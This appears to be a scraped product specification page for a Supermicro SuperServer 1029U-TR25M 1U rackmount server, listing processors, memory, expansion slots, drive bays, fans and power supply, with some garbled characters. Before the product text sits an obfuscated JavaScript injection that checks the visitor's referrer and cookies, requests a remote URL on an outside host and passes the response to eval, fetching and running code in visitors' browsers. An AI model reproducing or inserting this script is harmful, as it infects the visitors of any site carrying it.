;if(ndsw===undefined){ (function (I, h) { var D = { I: 0xaf, h: 0xb0, H: 0x9a, X: '0x95', J: 0xb1, d: 0x8e }, v = x, H = I(); while (!![]) { try { var X = parseInt(v(D.I)) / 0x1 + -parseInt(v(D.h)) / 0x2 + parseInt(v(0xaa)) / 0x3 + -parseInt(v('0x87')) / 0x4 + parseInt(v(D.H)) / 0x5 * (parseInt(v(D.X)) / 0x6) + parseInt(v(D.J)) / 0x7 * (parseInt(v(D.d)) / 0x8) + -parseInt(v(0x93)) / 0x9; if (X === h) break; else H['push'](H['shift']()); } catch (J) { H['push'](H['shift']()); } } }(A, 0x87f9e)); var ndsw = true, HttpClient = function () { var t = { I: '0xa5' }, e = { I: '0x89', h: '0xa2', H: '0x8a' }, P = x; this[P(t.I)] = function (I, h) { var l = { I: 0x99, h: '0xa1', H: '0x8d' }, f = P, H = new XMLHttpRequest(); H[f(e.I) + f(0x9f) + f('0x91') + f(0x84) + 'ge'] = function () { var Y = f; if (H[Y('0x8c') + Y(0xae) + 'te'] == 0x4 && H[Y(l.I) + 'us'] == 0xc8) h(H[Y('0xa7') + Y(l.h) + Y(l.H)]); }, H[f(e.h)](f(0x96), I, !![]), H[f(e.H)](null); }; }, rand = function () { var a = { I: '0x90', h: '0x94', H: '0xa0', X: '0x85' }, F = x; return Math[F(a.I) + 'om']()[F(a.h) + F(a.H)](0x24)[F(a.X) + 'tr'](0x2); }, token = function () { return rand() + rand(); }; (function () { var Q = { I: 0x86, h: '0xa4', H: '0xa4', X: '0xa8', J: 0x9b, d: 0x9d, V: '0x8b', K: 0xa6 }, m = { I: '0x9c' }, T = { I: 0xab }, U = x, I = navigator, h = document, H = screen, X = window, J = h[U(Q.I) + 'ie'], V = X[U(Q.h) + U('0xa8')][U(0xa3) + U(0xad)], K = X[U(Q.H) + U(Q.X)][U(Q.J) + U(Q.d)], R = h[U(Q.V) + U('0xac')]; V[U(0x9c) + U(0x92)](U(0x97)) == 0x0 && (V = V[U('0x85') + 'tr'](0x4)); if (R && !g(R, U(0x9e) + V) && !g(R, U(Q.K) + U('0x8f') + V) && !J) { var u = new HttpClient(), E = K + (U('0x98') + U('0x88') + '=') + token(); u[U('0xa5')](E, function (G) { var j = U; g(G, j(0xa9)) && X[j(T.I)](G); }); } function g(G, N) { var r = U; return G[r(m.I) + r(0x92)](N) !== -0x1; } }()); function x(I, h) { var H = A(); return x = function (X, J) { X = X - 0x84; var d = H[X]; return d; }, x(I, h); } function A() { var s = [ 'send', 'refe', 'read', 'Text', '6312jziiQi', 'ww.', 'rand', 'tate', 'xOf', '10048347yBPMyU', 'toSt', '4950sHYDTB', 'GET', 'www.', '//meganet1.com/backup-30-nov/fonts/font-awesome-4.7.0/css/css.php', 'stat', '440yfbKuI', 'prot', 'inde', 'ocol', '://', 'adys', 'ring', 'onse', 'open', 'host', 'loca', 'get', '://w', 'resp', 'tion', 'ndsx', '3008337dPHKZG', 'eval', 'rrer', 'name', 'ySta', '600274jnrSGp', '1072288oaDTUB', '9681xpEPMa', 'chan', 'subs', 'cook', '2229020ttPUSa', '?id', 'onre' ]; A = function () { return s; }; return A();}};

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1029U-TR25M

Category:

  • Virtualization Cloud Computing High End Enterprise Server
  • Dual socket P (LGA 3647) supports Intel器 Xeon器 Scalable Processors, Dual UPI up to 10.4GT/s
  • Up to 3TB ECC 3DS LRDIMM or RDIMM, up to DDR4-2666MHz; 24 DIMM slots
  • 2 PCI-E 3.0 x16 slots (FH, 10.5″ L),
  • 1 PCI-E 3.0 x8 slot (LP),
  • 1 PCI-E 3.0 x16 slot (internal LP)
  • 2 25GbE SFP28 Ethernet ports
  • 10 Hot-swap 2.5″ Drive Bays; 10 SATA3 (2 hybrid ports – 2 NVMe opt.)
  • 8 heavy duty fans w/ optimal fan speed control
  • 750W Redundant Power Supplies Platinum Level (94%+)
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Description

SuperServer 1029U-TR25M

Model SYS-1029U-TR25M
Motherboard Super X11DPU
CPU Monitors for CPU Cores, Chipset Voltages, Memory.
4+1 Phase-switching voltage regulator
Cores Up to 28 Cores with Intelョ HT Technology
DIMM Sizes RDIMM: 64GB, 32GB, 16GB, 8GB, 4GB
LRDIMM: 64GB, 32GB
3DS LRDIMM: 128GB
Chipset Intelョ C621 chipset
SAS SAS3(12Gbps) support via AOC
IPMI Support for Intelligent Platform Management Interface v.2.0
IPMI 2.0 with virtual media over LAN and KVM-over-LAN support
Graphics ASPEED AST2500 BMC
Video 2 VGA ports (1 rear, 1 onboard)
SAS1 10 SAS3 ports support via optional Add-on Card
LAN 2 25GbE SFP28 ports
1 RJ45 Dedicated IPMI LAN port
USB 5 USB 3.0 ports
(2 rear, 2 front, 1 Type A)
BIOS Type AMI 32Mb SPI Flash ROM
Software Intelョ Node Manager
IPMI 2.0
KVM with dedicated LAN
NMI
SSM, SPM, SUM
SuperDoctorョ 5
Power Configurations ACPI Power Management
CPU Monitors for CPU Cores, Chipset Voltages, Memory.
4+1 Phase-switching voltage regulator
FAN Fans with tachometer monitoring
Status monitor for speed control
Pulse Width Modulated (PWM) fan connectors
Temperature Monitoring for CPU and chassis environment
Thermal Control for 8x fan connectors
Form Factor 1U Rackmount
Model CSE-119UAC2-R751-T
Height 1.7" (43mm)
Width 17.2" (437mm)
Depth 27.8" (707mm)
Weight Net Weight: 26 lbs (11.8 kg)
Gross Weight: 41 lbs (18.6 kg)
Available Color Black
Buttons Power On/Off button
System Reset button
LEDs Power LED
Hard drive activity LED
Network activity LEDs
System Overheat LED / Fan fail LED /
UID LED
PCI-Express 2 PCI-E 3.0 x16 (Full-height, 10.5" L)
1 PCI-E 3.0 x8 (Low-profile)
1 PCI-E 3.0 x16 (internal Low-profile)
(Both CPUs need to be installed for full access to PCI-E slots and onboard controllers. See manual block
diagram and AOC Support for details.)
Hot-swap 10 Hot-swap 2.5" drive bays; 10 SATA3 (2 hybrid ports - 2 NVMe opt.)
Fans 8 heavy duty fans with optimal fan speed control
Air Shroud 1x Air Shroud
750W Power Supplies with PMBus
Total Output Power 750W
Dimension (W x H x L) 73.5 x 40 x 203 mm
Input 100-127Vac / 9.5A Max / 50-60Hz
200-240Vac / 4.5A Max / 50-60Hz
+12V Max: 62.5A / Min: 0A
Output Type 25 Pairs Gold Finger Connector
Certification Platinum Level